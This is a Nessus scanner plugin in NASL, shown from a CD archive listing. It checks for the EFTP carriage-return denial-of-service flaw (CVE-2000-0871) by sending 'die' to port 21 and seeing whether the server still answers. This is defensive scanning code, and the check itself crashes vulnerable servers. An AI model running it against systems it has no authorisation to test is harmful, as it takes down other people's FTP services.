home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / eftp_dos.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  102 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10510);
  10.  script_bugtraq_id(1677);
  11.  script_version ("$Revision: 1.12 $");
  12.  script_cve_id("CVE-2000-0871");
  13.  
  14.  name["english"] = "EFTP carriage return DoS";
  15.  name["francais"] = "DΘni de service EFTP - retour chariot";
  16.  
  17.  script_name(english:name["english"], francais:name["francais"]);
  18.  
  19.  desc["english"] = "
  20. The remote FTP server crashes when data is sent
  21. to port 21 without a carriage return at the end.
  22.  
  23. An attacker may use this flaw to prevent you
  24. from publishing anything using FTP.
  25.  
  26. Solution : if you are using eftp, then change your ftp
  27. server, if you are not, then contact
  28. your vendor for a fix.
  29.  
  30. Risk factor : High";
  31.  
  32.  
  33.  
  34.  desc["francais"] = "
  35. Le serveur FTP distant plante lorsque des donnΘes
  36. sont envoyΘes sur le port 21 sans retour chariot α
  37. la fin.
  38.  
  39.  
  40. Un pirate peut utiliser ce problΦme pour vous empecher
  41. de publier quoi que ce soit par ftp.
  42.  
  43. Solution; si vous utilisez eftp, alors changez de 
  44. serveur ftp. Sinon, contactez le vendeur et
  45. informez-le de cette vulnΘrabilitΘ.
  46.  
  47. Facteur de risque : SΘrieux";
  48.  
  49.  
  50.  script_description(english:desc["english"], francais:desc["francais"]);
  51.  
  52.  summary["english"] = "Crashes the remote ftp server";
  53.  summary["francais"] = "Plante le serveur ftp distant";
  54.  script_summary(english:summary["english"], francais:summary["francais"]);
  55.  
  56.  script_category(ACT_DESTRUCTIVE_ATTACK);
  57.  
  58.  
  59.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  60.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  61.  family["english"] = "FTP";
  62.  family["francais"] = "FTP";
  63.  script_family(english:family["english"], francais:family["francais"]);
  64.  script_dependencie("find_service.nes", "ftp_anonymous.nasl");
  65.  script_require_ports("Services/ftp", 21);
  66.  script_exclude_keys("ftp/false_ftp");
  67.  exit(0);
  68. }
  69.  
  70. #
  71. # The script code starts here
  72. #
  73.  
  74. include("ftp_func.inc");
  75.  
  76. port = get_kb_item("Services/ftp");
  77. if(!port)port = 21;
  78. if(get_port_state(port))
  79. {
  80.  soc = open_sock_tcp(port);
  81.  if(soc)
  82.  {
  83.   r = ftp_recv_line(socket:soc);
  84.   if(!r)exit(0);
  85.   
  86.   send(socket:soc, data:"die");
  87.   close(soc);
  88.  
  89.   sleep(1);
  90.   soc = open_sock_tcp(port);
  91.   if(!soc)
  92.   {
  93.     security_hole(port);
  94.     exit(0);
  95.   }
  96.   r = ftp_recv_line(socket:soc);
  97.   close(soc);
  98.   
  99.   if(!r)security_hole(port);
  100.  }
  101. }
  102.